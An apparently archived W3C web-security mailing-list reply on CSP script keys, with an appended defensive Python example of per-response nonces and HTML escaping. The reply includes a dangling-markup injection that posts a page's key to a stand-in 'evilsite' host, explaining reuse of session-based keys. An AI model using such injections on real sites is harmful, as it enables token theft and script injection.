- From: gaz Heyes <gazheyes@gmail.com>
- Date: Fri, 28 Jan 2011 10:41:07 +0000
- To: Gervase Markham <gerv@mozilla.org>
- Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
- Message-ID: <AANLkTinPwm8J5A5zJaSE=c+5Lcz180fHG2KNEjtujJBE@mail.gmail.com>
On 28 January 2011 10:33, Gervase Markham <gerv@mozilla.org> wrote:

> How would you steal all tokens if you couldn't run any script because you
> didn't have the token?
>

HTML5 makes that nice and easy for us: form-action, form-target, <textarea>, CSS styles width:100%;height:100%; there are lots of ways, and HTML5 increases them.

> If the token is equivalent to the user's session ID, then running some
> malicious script becomes an equivalent problem to stealing their session ID
> without script. That doesn't sound trivial to me.
>
> Or have I missed something?
>
> and then inject
>>
>> If for some crazy reason you decide to
>> use session based tokens then you would have to validate all HTML
>> injections
>>
>
> I'm not sure what you mean by "validate all HTML injections", but I don't
> think anyone is suggesting that using CSP means that you can just safely
> print arbitrary user-supplied content as HTML.
>

OK, if we don't have a start and end marker and just one script key, any injection before the script key can steal it: <form action=//evilsite><textarea name=Can_I_have_a_key_please_bob>. If the key is session based, that means we can reuse it, and that means that our second request injects some JavaScript with a valid key. Now if we have a start and end marker we can parse the content inside and determine the restrictions, e.g. this content shouldn't be posted externally; then after parsing the HTML you can work out if the form should work or
Received on Friday, 28 January 2011 10:41:39 UTC
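A defender-side illustration of the two points in this exchange, added here as an example that is not part of the original message or of any project discussed in the thread: a CSP script nonce generated fresh for every response (rather than a session-wide key) means that a value captured from one response does not allow-list script in any later response, and HTML-escaping untrusted content is what stops an injection from opening a form or textarea ahead of the trusted script in the first place. The function names, the page template and the sample comment strings are assumptions made for this example.

```python
import html
import secrets

CSP_HEADER = "Content-Security-Policy"


def make_nonce() -> str:
    """Fresh 128-bit CSPRNG nonce for ONE response; never stored in the session,
    so a captured value cannot be replayed against a later response."""
    return secrets.token_urlsafe(16)


def render_page(untrusted_comment: str, nonce: str) -> tuple:
    """Return (body, headers) for a page that runs one trusted inline script.

    The untrusted comment is HTML-escaped, so it cannot open a <form>,
    <textarea> or any other tag ahead of the trusted <script>.  The trusted
    script carries the per-response nonce that the CSP header allow-lists.
    """
    escaped = html.escape(untrusted_comment, quote=True)
    body = (
        "<!doctype html><html><body>"
        f'<div class="comment">{escaped}</div>'
        f'<script nonce="{nonce}">console.log("trusted");</script>'
        "</body></html>"
    )
    headers = {CSP_HEADER: f"script-src 'nonce-{nonce}'"}
    return body, headers


def nonce_allowed(headers: dict, nonce: str) -> bool:
    """Hypothetical server-side mirror of the browser's check: is this nonce
    allow-listed by this particular response's CSP header?  Used below to show
    that a nonce lifted from an earlier response is useless against a later one."""
    policy = headers.get(CSP_HEADER, "")
    return f"'nonce-{nonce}'" in policy.split()


def demo() -> dict:
    """Two responses: a token lifted from the first does not match the second,
    and the constructed dangling-markup comment is rendered as inert text."""
    n1 = make_nonce()
    # Constructed sample input modelled on the message above; it is escaped, not executed.
    body1, h1 = render_page('<form action="https://example.invalid"><textarea>', n1)
    n2 = make_nonce()
    body2, h2 = render_page("a harmless comment", n2)
    return {
        "injection_neutralised": "<form" not in body1 and "<textarea" not in body1,
        "own_nonce_works": nonce_allowed(h1, n1) and nonce_allowed(h2, n2),
        "replayed_nonce_rejected": not nonce_allowed(h2, n1),
    }


if __name__ == "__main__":
    print(demo())
```

The browser performs the real nonce check; `nonce_allowed` only models it so the replay failure can be shown offline. The design point is that the nonce's lifetime is one response: a session-scoped key would make `replayed_nonce_rejected` false, which is exactly the reuse the message describes.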